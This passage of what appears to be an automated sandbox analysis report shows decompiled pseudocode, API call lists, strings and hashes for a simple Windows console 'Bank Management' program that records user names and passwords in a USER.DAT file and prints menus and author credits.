                                                							_t85 = _t85 + 4;
                                                							_t67 = _v8 + 1;
                                                							__eflags = _t67;
                                                							_v8 = _t67;
                                                						}
                                                					} else {
                                                						E012312B0(0xa, 0xa);
                                                						_push(0x124f3e0);
                                                						E0123715C(_t73, _t83, _t84, __eflags);
                                                						_t85 = _t90 + 4;
                                                						_v8 = _v8 + 1;
                                                					}
                                                					__eflags = _v8;
                                                				} while (__eflags != 0);
                                                				 *0x1252f28 = E01236EF1("USER.DAT", 0x124f474);
                                                				_t76 =  *0x1252f28; // 0x0
                                                				_push(_t76);
                                                				E01236DB6(_t73, _t83, _t84, __eflags);
                                                				 *0x1252f28 = E01236EF1("USER.DAT", "a");
                                                				_push(0x1252f02);
                                                				_push(0x1252ee4);
                                                				_push(0x1252ee0);
                                                				_push("%s %s %s\n");
                                                				_t79 =  *0x1252f28; // 0x0
                                                				_push(_t79);
                                                				E01236F06(_t73, _t83, _t84, __eflags);
                                                				_t58 =  *0x1252f28; // 0x0
                                                				_push(_t58);
                                                				E01236DB6(_t73, _t83, _t84, __eflags);
                                                				E012320E0(_t76, _t83, _t84, __eflags, _t103);
                                                				E012312B0(0x19, 0xa);
                                                				_push("Record ADDED successfully!");
                                                				return E0123715C(_t73, _t83, _t84, __eflags);
                                                			}











































                                                0x012325c0
                                                0x012325c0
                                                0x012325c0
                                                0x012325c0
                                                0x012325c9
                                                0x012325d0
                                                0x012325d7
                                                0x012325dd
                                                0x012325e0
                                                0x012325e3
                                                0x012325e6
                                                0x012325e9
                                                0x012325ec
                                                0x012325ef
                                                0x012325f2
                                                0x012325f5
                                                0x012325f9
                                                0x012325fb
                                                0x012325fe
                                                0x01232601
                                                0x01232604
                                                0x01232607
                                                0x0123260a
                                                0x0123260d
                                                0x01232610
                                                0x01232613
                                                0x01232613
                                                0x01232618
                                                0x01232623
                                                0x01232628
                                                0x0123262d
                                                0x0123263f
                                                0x01232651
                                                0x01232656
                                                0x01232659
                                                0x0123265e
                                                0x01232665
                                                0x0123266b
                                                0x0123266f
                                                0x0123267a
                                                0x01232681
                                                0x01232686
                                                0x0123268c
                                                0x00000000
                                                0x00000000
                                                0x01232697
                                                0x0123269c
                                                0x012326a1
                                                0x012326a9
                                                0x012326a9
                                                0x012326ac
                                                0x012326ae
                                                0x012326ae
                                                0x012326b4
                                                0x012326b5
                                                0x012326ba
                                                0x012326bd
                                                0x012326c1
                                                0x012326e8
                                                0x012326ed
                                                0x012326f2
                                                0x012326fe
                                                0x01232707
                                                0x0123270c
                                                0x01232711
                                                0x01232719
                                                0x0123271d
                                                0x0123272b
                                                0x01232730
                                                0x01232733
                                                0x01232735
                                                0x01232737
                                                0x01232740
                                                0x01232745
                                                0x0123274a
                                                0x0123274f
                                                0x01232755
                                                0x01232755
                                                0x01232758
                                                0x01232758
                                                0x012326c3
                                                0x012326c7
                                                0x012326cc
                                                0x012326d1
                                                0x012326d6
                                                0x012326df
                                                0x012326df
                                                0x0123275b
                                                0x0123275b
                                                0x01232777
                                                0x0123277c
                                                0x01232782
                                                0x01232783
                                                0x0123279d
                                                0x012327a2
                                                0x012327a7
                                                0x012327ac
                                                0x012327b1
                                                0x012327b6
                                                0x012327bc
                                                0x012327bd
                                                0x012327c5
                                                0x012327ca
                                                0x012327cb
                                                0x012327d3
                                                0x012327dc
                                                0x012327e1
                                                0x012327f1

                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 0123262D
                                                • _wscanf.LIBCMT ref: 0123263F
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _swscanf.LIBCMT ref: 01232681
                                                  • Part of subcall function 01237021: _vfscanf.LIBCMT ref: 01237035
                                                • _wprintf.LIBCMT ref: 012326D1
                                                • _wprintf.LIBCMT ref: 012326F2
                                                • _wprintf.LIBCMT ref: 01232711
                                                • _wprintf.LIBCMT ref: 0123274A
                                                • _fprintf.LIBCMT ref: 012327BD
                                                • _wprintf.LIBCMT ref: 012327E6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__fsopen_fprintf_swscanf_vfscanf_vwscanf_wscanf
                                                • String ID: %s %s %s$%s %s %s$Confirm Password : $Password : $Record ADDED successfully!$USER.DAT$USER.DAT$USER.DAT$User Name :
                                                • API String ID: 3917209068-3252730458
                                                • Opcode ID: 610a211e7216a3f412340d693cf4ca47ff4aa6f30c8cf96b8b88b39b9e9796fc
                                                • Instruction ID: bdb29ec0656845abf92865ede578f01533887ee038f045a38b4cf734633c5e7a
                                                • Opcode Fuzzy Hash: 610a211e7216a3f412340d693cf4ca47ff4aa6f30c8cf96b8b88b39b9e9796fc
                                                • Instruction Fuzzy Hash: 5E51ABF1D70305FFDB14EFA8ED42BED7AB46FA5704F04402DE504B6280EAB092589766
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 73%
                                                			E012321E0(void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                				intOrPtr _v8;
                                                				void* __ebp;
                                                				void* _t28;
                                                				intOrPtr _t31;
                                                				void* _t34;
                                                				void* _t35;
                                                				void* _t36;
                                                
                                                				_t33 = __esi;
                                                				_t32 = __edi;
                                                				E01231380(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
                                                				E012312B0(0x1b, 4);
                                                				_push("BANK MANAGEMENT //");
                                                				E0123715C(_t28, __edi, __esi, __eflags);
                                                				_t35 = _t34 + 4;
                                                				E012312B0(0x19, 5);
                                                				_v8 = 0;
                                                				while(1) {
                                                					_t42 = _v8 - 0x1b;
                                                					if(_v8 >= 0x1b) {
                                                						break;
                                                					}
                                                					_push(0xc4);
                                                					_push("%c");
                                                					E0123715C(_t28, _t32, _t33, _t42);
                                                					_t35 = _t35 + 8;
                                                					_v8 = _v8 + 1;
                                                				}
                                                				E012312B0(0x19, 8);
                                                				_push("Designed and Programmed by:");
                                                				E0123715C(_t28, _t32, _t33, __eflags);
                                                				_t36 = _t35 + 4;
                                                				E012312B0(0x19, 9);
                                                				_v8 = 0;
                                                				while(1) {
                                                					__eflags = _v8 - 0x1b;
                                                					if(__eflags >= 0) {
                                                						break;
                                                					}
                                                					_push(0xc4);
                                                					_push("%c");
                                                					E0123715C(_t28, _t32, _t33, __eflags);
                                                					_t36 = _t36 + 8;
                                                					_t31 = _v8 + 1;
                                                					__eflags = _t31;
                                                					_v8 = _t31;
                                                				}
                                                				E012312B0(0x21, 0xb);
                                                				_push("Ravi Agrawal");
                                                				E0123715C(_t28, _t32, _t33, __eflags);
                                                				E012312B0(0x21, 0xd);
                                                				_push("Sagar Sharma");
                                                				E0123715C(_t28, _t32, _t33, __eflags);
                                                				E012312B0(0x21, 0xf);
                                                				_push("Sawal Maskey");
                                                				E0123715C(_t28, _t32, _t33, __eflags);
                                                				E012312B0(0x18, 0x14);
                                                				_push("Press Any key to continue...");
                                                				return E0123715C(_t28, _t32, _t33, __eflags);
                                                			}










                                                0x012321e0
                                                0x012321e0
                                                0x012321ec
                                                0x012321f5
                                                0x012321fa
                                                0x012321ff
                                                0x01232204
                                                0x0123220b
                                                0x01232210
                                                0x01232222
                                                0x01232222
                                                0x01232226
                                                0x00000000
                                                0x00000000
                                                0x01232228
                                                0x0123222d
                                                0x01232232
                                                0x01232237
                                                0x0123221f
                                                0x0123221f
                                                0x01232240
                                                0x01232245
                                                0x0123224a
                                                0x0123224f
                                                0x01232256
                                                0x0123225b
                                                0x0123226d
                                                0x0123226d
                                                0x01232271
                                                0x00000000
                                                0x00000000
                                                0x01232273
                                                0x01232278
                                                0x0123227d
                                                0x01232282
                                                0x01232267
                                                0x01232267
                                                0x0123226a
                                                0x0123226a
                                                0x0123228b
                                                0x01232290
                                                0x01232295
                                                0x012322a1
                                                0x012322a6
                                                0x012322ab
                                                0x012322b7
                                                0x012322bc
                                                0x012322c1
                                                0x012322cd
                                                0x012322d2
                                                0x012322e2

                                                APIs
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 0123139D
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313FC
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231470
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231493
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 012321FF
                                                • _wprintf.LIBCMT ref: 01232232
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 0123224A
                                                • _wprintf.LIBCMT ref: 0123227D
                                                • _wprintf.LIBCMT ref: 01232295
                                                • _wprintf.LIBCMT ref: 012322AB
                                                • _wprintf.LIBCMT ref: 012322C1
                                                • _wprintf.LIBCMT ref: 012322D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                • String ID: BANK MANAGEMENT //$Designed and Programmed by:$Press Any key to continue...$Ravi Agrawal$Sagar Sharma$Sawal Maskey
                                                • API String ID: 1778593935-2888666035
                                                • Opcode ID: bb80b41af1ac69cd044a5e3b3c2153553a73aab9ca4655b38ba03c0bbdfde7d0
                                                • Instruction ID: 31672184893a7d4b51700bf9b68a38bed7aafc7c2a576a83b6f59c93706bf5af
                                                • Opcode Fuzzy Hash: bb80b41af1ac69cd044a5e3b3c2153553a73aab9ca4655b38ba03c0bbdfde7d0
                                                • Instruction Fuzzy Hash: 2A217FF1BB4316B6FB157BE85D03FBD31605BE1B54F014124BA41392C1E9F1261852A7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 66%
                                                			E012320E0(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				intOrPtr _v8;
                                                				void* __ebp;
                                                				void* _t9;
                                                				intOrPtr _t16;
                                                				void* _t20;
                                                				void* _t24;
                                                				void* _t26;
                                                				void* _t27;
                                                				void* _t31;
                                                				void* _t37;
                                                
                                                				_t37 = __fp0;
                                                				_t23 = __esi;
                                                				_t22 = __edi;
                                                				E01231380(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
                                                				E012312B0(0x19, 1);
                                                				_push("Banking Management //");
                                                				E0123715C(_t20, __edi, __esi, __eflags);
                                                				E012312B0(5, 3);
                                                				_t9 = E01238230(0x1252ee4, "Admin");
                                                				_t26 = _t24 + 0xc;
                                                				if(_t9 == 0) {
                                                					 *0x1252240 = 1;
                                                				}
                                                				_t34 =  *0x1252240;
                                                				if( *0x1252240 == 0) {
                                                					_push(0x1252ee4);
                                                					_push("Current User : %s");
                                                					E0123715C(_t20, _t22, _t23, __eflags);
                                                					_t27 = _t26 + 8;
                                                				} else {
                                                					_push("Current User : Admin");
                                                					E0123715C(_t20, _t22, _t23, _t34);
                                                					_t27 = _t26 + 4;
                                                				}
                                                				_push("\t\t\t\tDate : ");
                                                				E0123715C(_t20, _t22, _t23, _t34);
                                                				E0123834B(_t34, 0x1252f40);
                                                				_push(0x1252f40);
                                                				E012316A0(_t22, _t23, _t37);
                                                				_push(0x1252f40);
                                                				_push("%s");
                                                				E0123715C(_t20, _t22, _t23, _t34);
                                                				E0123834B(_t34, 0x1252f40);
                                                				_t31 = _t27 + 0x14;
                                                				_t16 = E012312B0(1, 5);
                                                				_v8 = 0;
                                                				while(1) {
                                                					_t35 = _v8 - 0x4e;
                                                					if(_v8 >= 0x4e) {
                                                						break;
                                                					}
                                                					_push(0xc4);
                                                					_push("%c");
                                                					E0123715C(_t20, _t22, _t23, _t35);
                                                					_t31 = _t31 + 8;
                                                					_t16 = _v8 + 1;
                                                					_v8 = _t16;
                                                				}
                                                				return _t16;
                                                			}













                                                0x012320e0
                                                0x012320e0
                                                0x012320e0
                                                0x012320ec
                                                0x012320f5
                                                0x012320fa
                                                0x012320ff
                                                0x0123210b
                                                0x0123211a
                                                0x0123211f
                                                0x01232124
                                                0x01232126
                                                0x01232126
                                                0x01232130
                                                0x01232137
                                                0x01232148
                                                0x0123214d
                                                0x01232152
                                                0x01232157
                                                0x01232139
                                                0x01232139
                                                0x0123213e
                                                0x01232143
                                                0x01232143
                                                0x0123215a
                                                0x0123215f
                                                0x0123216c
                                                0x01232174
                                                0x01232179
                                                0x0123217e
                                                0x01232183
                                                0x01232188
                                                0x01232195
                                                0x0123219a
                                                0x012321a1
                                                0x012321a6
                                                0x012321b8
                                                0x012321b8
                                                0x012321bc
                                                0x00000000
                                                0x00000000
                                                0x012321be
                                                0x012321c3
                                                0x012321c8
                                                0x012321cd
                                                0x012321b2
                                                0x012321b5
                                                0x012321b5
                                                0x012321d5

                                                APIs
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 0123139D
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313FC
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231470
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231493
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 012320FF
                                                • _wprintf.LIBCMT ref: 0123213E
                                                • _wprintf.LIBCMT ref: 01232152
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 0123215F
                                                • __wstrtime.LIBCMT ref: 0123216C
                                                • _wprintf.LIBCMT ref: 01232188
                                                • __wstrtime.LIBCMT ref: 01232195
                                                • _wprintf.LIBCMT ref: 012321C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                • String ID: Date : $Admin$Banking Management //$Current User : %s$Current User : Admin$N
                                                • API String ID: 3817360410-644830535
                                                • Opcode ID: 684903d57c73315166edaf968c06c9a40e277e63f0ba1112a7cc0e2fed92f2c4
                                                • Instruction ID: aa7eb6eefecd4d31fd9186674e220e13b62dc7552f68dff6d8c843a5bed3c135
                                                • Opcode Fuzzy Hash: 684903d57c73315166edaf968c06c9a40e277e63f0ba1112a7cc0e2fed92f2c4
                                                • Instruction Fuzzy Hash: ED119EF1BF4303F6E7947BA26D43F6931505BA0B15F040168FF84392C1E5F1661801AB
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E0123A5E2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                				signed int _t81;
                                                				void* _t86;
                                                				long _t90;
                                                				signed int _t94;
                                                				signed int _t98;
                                                				signed int _t99;
                                                				signed char _t103;
                                                				signed int _t105;
                                                				intOrPtr _t106;
                                                				intOrPtr* _t109;
                                                				signed char _t111;
                                                				long _t119;
                                                				signed int _t130;
                                                				signed int _t134;
                                                				signed int _t135;
                                                				signed int _t138;
                                                				void** _t139;
                                                				signed int _t141;
                                                				void* _t142;
                                                				signed int _t143;
                                                				void** _t147;
                                                				signed int _t149;
                                                				void* _t150;
                                                				signed int _t154;
                                                				void* _t155;
                                                				void* _t160;
                                                
                                                				_push(0x64);
                                                				_push(0x124d8c0);
                                                				E01239160(__ebx, __edi, __esi);
                                                				E0123BE5F(0xb);
                                                				_t130 = 0;
                                                				 *(_t155 - 4) = 0;
                                                				_t160 =  *0x1252f60 - _t130; // 0x0
                                                				if(_t160 == 0) {
                                                					_push(0x40);
                                                					_t141 = 0x20;
                                                					_push(_t141);
                                                					_t81 = E0123C55B();
                                                					_t134 = _t81;
                                                					 *(_t155 - 0x24) = _t134;
                                                					__eflags = _t134;
                                                					if(_t134 != 0) {
                                                						 *0x1252f60 = _t81;
                                                						 *0x1252f5c = _t141;
                                                						while(1) {
                                                							__eflags = _t134 - _t81 + 0x800;
                                                							if(_t134 >= _t81 + 0x800) {
                                                								break;
                                                							}
                                                							 *((short*)(_t134 + 4)) = 0xa00;
                                                							 *_t134 =  *_t134 | 0xffffffff;
                                                							 *(_t134 + 8) = _t130;
                                                							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
                                                							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x0000007f;
                                                							 *((short*)(_t134 + 0x25)) = 0xa0a;
                                                							 *(_t134 + 0x38) = _t130;
                                                							 *(_t134 + 0x34) = _t130;
                                                							_t134 = _t134 + 0x40;
                                                							 *(_t155 - 0x24) = _t134;
                                                							_t81 =  *0x1252f60; // 0x0
                                                						}
                                                						GetStartupInfoW(_t155 - 0x74);
                                                						__eflags =  *((short*)(_t155 - 0x42));
                                                						if( *((short*)(_t155 - 0x42)) == 0) {
                                                							while(1) {
                                                								L31:
                                                								 *(_t155 - 0x2c) = _t130;
                                                								__eflags = _t130 - 3;
                                                								if(_t130 >= 3) {
                                                									break;
                                                								}
                                                								_t147 = (_t130 << 6) +  *0x1252f60;
                                                								 *(_t155 - 0x24) = _t147;
                                                								__eflags =  *_t147 - 0xffffffff;
                                                								if( *_t147 == 0xffffffff) {
                                                									L35:
                                                									_t147[1] = 0x81;
                                                									__eflags = _t130;
                                                									if(_t130 != 0) {
                                                										_t66 = _t130 - 1; // -1
                                                										asm("sbb eax, eax");
                                                										_t90 =  ~_t66 + 0xfffffff5;
                                                										__eflags = _t90;
                                                									} else {
                                                										_t90 = 0xfffffff6;
                                                									}
                                                									_t142 = GetStdHandle(_t90);
                                                									__eflags = _t142 - 0xffffffff;
                                                									if(_t142 == 0xffffffff) {
                                                										L47:
                                                										_t147[1] = _t147[1] | 0x00000040;
                                                										 *_t147 = 0xfffffffe;
                                                										_t94 =  *0x1253064;
                                                										__eflags = _t94;
                                                										if(_t94 != 0) {
                                                											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
                                                										}
                                                										goto L49;
                                                									} else {
                                                										__eflags = _t142;
                                                										if(_t142 == 0) {
                                                											goto L47;
                                                										}
                                                										_t98 = GetFileType(_t142);
                                                										__eflags = _t98;
                                                										if(_t98 == 0) {
                                                											goto L47;
                                                										}
                                                										 *_t147 = _t142;
                                                										_t99 = _t98 & 0x000000ff;
                                                										__eflags = _t99 - 2;
                                                										if(_t99 != 2) {
                                                											__eflags = _t99 - 3;
                                                											if(_t99 != 3) {
                                                												L46:
                                                												_t70 =  &(_t147[3]); // -19214164
                                                												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
                                                												_t147[2] = _t147[2] + 1;
                                                												L49:
                                                												_t130 = _t130 + 1;
                                                												continue;
                                                											}
                                                											_t103 = _t147[1] | 0x00000008;
                                                											__eflags = _t103;
                                                											L45:
                                                											_t147[1] = _t103;
                                                											goto L46;
                                                										}
                                                										_t103 = _t147[1] | 0x00000040;
                                                										goto L45;
                                                									}
                                                								}
                                                								__eflags =  *_t147 - 0xfffffffe;
                                                								if( *_t147 == 0xfffffffe) {
                                                									goto L35;
                                                								}
                                                								_t147[1] = _t147[1] | 0x00000080;
                                                								goto L49;
                                                							}
                                                							 *(_t155 - 4) = 0xfffffffe;
                                                							E0123A8A6();
                                                							L2:
                                                							_t86 = 1;
                                                							L3:
                                                							return E012391A5(_t86);
                                                						}
                                                						_t105 =  *(_t155 - 0x40);
                                                						__eflags = _t105;
                                                						if(_t105 == 0) {
                                                							goto L31;
                                                						}
                                                						_t135 =  *_t105;
                                                						 *(_t155 - 0x1c) = _t135;
                                                						_t106 = _t105 + 4;
                                                						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                                                						 *(_t155 - 0x20) = _t106 + _t135;
                                                						__eflags = _t135 - 0x800;
                                                						if(_t135 >= 0x800) {
                                                							_t135 = 0x800;
                                                							 *(_t155 - 0x1c) = 0x800;
                                                						}
                                                						_t149 = 1;
                                                						__eflags = 1;
                                                						 *(_t155 - 0x30) = 1;
                                                						while(1) {
                                                							__eflags =  *0x1252f5c - _t135; // 0x0
                                                							if(__eflags >= 0) {
                                                								break;
                                                							}
                                                							_t138 = E0123C55B(_t141, 0x40);
                                                							 *(_t155 - 0x24) = _t138;
                                                							__eflags = _t138;
                                                							if(_t138 != 0) {
                                                								0x1252f60[_t149] = _t138;
                                                								 *0x1252f5c =  *0x1252f5c + _t141;
                                                								__eflags =  *0x1252f5c;
                                                								while(1) {
                                                									__eflags = _t138 - 0x1252f60[_t149] + 0x800;
                                                									if(_t138 >= 0x1252f60[_t149] + 0x800) {
                                                										break;
                                                									}
                                                									 *((short*)(_t138 + 4)) = 0xa00;
                                                									 *_t138 =  *_t138 | 0xffffffff;
                                                									 *(_t138 + 8) = _t130;
                                                									 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
                                                									 *((short*)(_t138 + 0x25)) = 0xa0a;
                                                									 *(_t138 + 0x38) = _t130;
                                                									 *(_t138 + 0x34) = _t130;
                                                									_t138 = _t138 + 0x40;
                                                									 *(_t155 - 0x24) = _t138;
                                                								}
                                                								_t149 = _t149 + 1;
                                                								 *(_t155 - 0x30) = _t149;
                                                								_t135 =  *(_t155 - 0x1c);
                                                								continue;
                                                							}
                                                							_t135 =  *0x1252f5c; // 0x0
                                                							 *(_t155 - 0x1c) = _t135;
                                                							break;
                                                						}
                                                						_t143 = _t130;
                                                						 *(_t155 - 0x2c) = _t143;
                                                						_t109 =  *((intOrPtr*)(_t155 - 0x28));
                                                						_t139 =  *(_t155 - 0x20);
                                                						while(1) {
                                                							__eflags = _t143 - _t135;
                                                							if(_t143 >= _t135) {
                                                								goto L31;
                                                							}
                                                							_t150 =  *_t139;
                                                							__eflags = _t150 - 0xffffffff;
                                                							if(_t150 == 0xffffffff) {
                                                								L26:
                                                								_t143 = _t143 + 1;
                                                								 *(_t155 - 0x2c) = _t143;
                                                								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                                                								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                                                								_t139 =  &(_t139[1]);
                                                								 *(_t155 - 0x20) = _t139;
                                                								continue;
                                                							}
                                                							__eflags = _t150 - 0xfffffffe;
                                                							if(_t150 == 0xfffffffe) {
                                                								goto L26;
                                                							}
                                                							_t111 =  *_t109;
                                                							__eflags = _t111 & 0x00000001;
                                                							if((_t111 & 0x00000001) == 0) {
                                                								goto L26;
                                                							}
                                                							__eflags = _t111 & 0x00000008;
                                                							if((_t111 & 0x00000008) != 0) {
                                                								L24:
                                                								_t154 = ((_t143 & 0x0000001f) << 6) + 0x1252f60[_t143 >> 5];
                                                								 *(_t155 - 0x24) = _t154;
                                                								 *_t154 =  *_t139;
                                                								 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                                                								_t38 = _t154 + 0xc; // 0xd
                                                								InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
                                                								_t39 = _t154 + 8;
                                                								 *_t39 =  *(_t154 + 8) + 1;
                                                								__eflags =  *_t39;
                                                								_t139 =  *(_t155 - 0x20);
                                                								L25:
                                                								_t135 =  *(_t155 - 0x1c);
                                                								goto L26;
                                                							}
                                                							_t119 = GetFileType(_t150);
                                                							_t139 =  *(_t155 - 0x20);
                                                							__eflags = _t119;
                                                							if(_t119 == 0) {
                                                								goto L25;
                                                							}
                                                							goto L24;
                                                						}
                                                						goto L31;
                                                					}
                                                					E012396F0(_t155, 0x1251380, _t155 - 0x10, 0xfffffffe);
                                                					_t86 = 0;
                                                					goto L3;
                                                				}
                                                				E012396F0(_t155, 0x1251380, _t155 - 0x10, 0xfffffffe);
                                                				goto L2;
                                                			}





























                                                0x0123a5e2
                                                0x0123a5e4
                                                0x0123a5e9
                                                0x0123a5f0
                                                0x0123a5f6
                                                0x0123a5f8
                                                0x0123a5fb
                                                0x0123a601
                                                0x0123a621
                                                0x0123a625
                                                0x0123a626
                                                0x0123a627
                                                0x0123a62e
                                                0x0123a630
                                                0x0123a633
                                                0x0123a635
                                                0x0123a64e
                                                0x0123a653
                                                0x0123a659
                                                0x0123a65e
                                                0x0123a660
                                                0x00000000
                                                0x00000000
                                                0x0123a662
                                                0x0123a668
                                                0x0123a66b
                                                0x0123a66e
                                                0x0123a677
                                                0x0123a67a
                                                0x0123a680
                                                0x0123a683
                                                0x0123a686
                                                0x0123a689
                                                0x0123a68c
                                                0x0123a68c
                                                0x0123a697
                                                0x0123a69d
                                                0x0123a6a2
                                                0x0123a7d1
                                                0x0123a7d1
                                                0x0123a7d1
                                                0x0123a7d4
                                                0x0123a7d7
                                                0x00000000
                                                0x00000000
                                                0x0123a7e2
                                                0x0123a7e8
                                                0x0123a7eb
                                                0x0123a7ee
                                                0x0123a803
                                                0x0123a803
                                                0x0123a807
                                                0x0123a809
                                                0x0123a810
                                                0x0123a815
                                                0x0123a817
                                                0x0123a817
                                                0x0123a80b
                                                0x0123a80d
                                                0x0123a80d
                                                0x0123a821
                                                0x0123a823
                                                0x0123a826
                                                0x0123a86d
                                                0x0123a873
                                                0x0123a876
                                                0x0123a87c
                                                0x0123a881
                                                0x0123a883
                                                0x0123a888
                                                0x0123a888
                                                0x00000000
                                                0x0123a828
                                                0x0123a828
                                                0x0123a82a
                                                0x00000000
                                                0x00000000
                                                0x0123a82d
                                                0x0123a833
                                                0x0123a835
                                                0x00000000
                                                0x00000000
                                                0x0123a837
                                                0x0123a839
                                                0x0123a83e
                                                0x0123a841
                                                0x0123a84b
                                                0x0123a84e
                                                0x0123a859
                                                0x0123a85e
                                                0x0123a862
                                                0x0123a868
                                                0x0123a88f
                                                0x0123a88f
                                                0x00000000
                                                0x0123a88f
                                                0x0123a854
                                                0x0123a854
                                                0x0123a856
                                                0x0123a856
                                                0x00000000
                                                0x0123a856
                                                0x0123a847
                                                0x00000000
                                                0x0123a847
                                                0x0123a826
                                                0x0123a7f0
                                                0x0123a7f3
                                                0x00000000
                                                0x00000000
                                                0x0123a7fb
                                                0x00000000
                                                0x0123a7fb
                                                0x0123a895
                                                0x0123a89c
                                                0x0123a616
                                                0x0123a618
                                                0x0123a619
                                                0x0123a61e
                                                0x0123a61e
                                                0x0123a6a8
                                                0x0123a6ab
                                                0x0123a6ad
                                                0x00000000
                                                0x00000000
                                                0x0123a6b3
                                                0x0123a6b5
                                                0x0123a6b8
                                                0x0123a6bb
                                                0x0123a6c0
                                                0x0123a6c8
                                                0x0123a6ca
                                                0x0123a6cc
                                                0x0123a6ce
                                                0x0123a6ce
                                                0x0123a6d3
                                                0x0123a6d3
                                                0x0123a6d4
                                                0x0123a6d7
                                                0x0123a6d7
                                                0x0123a6dd
                                                0x00000000
                                                0x00000000
                                                0x0123a6e9
                                                0x0123a6eb
                                                0x0123a6ee
                                                0x0123a6f0
                                                0x0123a784
                                                0x0123a78b
                                                0x0123a78b
                                                0x0123a791
                                                0x0123a79d
